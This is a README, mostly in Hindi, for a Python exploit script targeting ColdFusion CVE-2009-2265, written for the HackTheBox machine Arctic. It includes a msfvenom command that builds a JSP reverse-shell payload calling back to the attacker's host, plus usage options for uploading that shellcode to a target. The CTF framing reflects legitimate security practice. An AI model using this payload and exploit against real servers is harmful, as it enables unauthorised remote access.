
coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/
coldfusion exploit पर आधारित https://cvedetails.com/cve/CVE-2009-2265/
इस विशेष CVE के लिए मैंने python स्क्रिप्ट बनाने का मुख्य कारण यह था कि जब मैंने HTB मशीन Arctic को हल करने का प्रयास किया तो उसी का metasploit संस्करण मेरे लिए काम नहीं करता था। साथ ही कुछ python अभ्यास करना भी अच्छा था। हालांकि उसी एक्सप्लॉइट का एक और python संस्करण उपलब्ध है जिसे मूल रूप से Alexander Reid ने बनाया था, यदि आप उसके संस्करण का उपयोग करना पसंद करते हैं।
उपयोग काफी सरल है:
सुनिश्चित करें कि आपके पास एक पेलोड फ़ाइल बनाई गई है
उदाहरण के लिए msfvenom का उपयोग करके:
msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp
उपयोग: python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
वैकल्पिक तर्क:
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
-t TARGET लक्ष्य IP
-p PORT लक्ष्य पोर्ट
-f FILEPATH अपलोड करने के लिए shellcode वाली फ़ाइल का पथ
-b BASEPATH coldfusion आधार पथ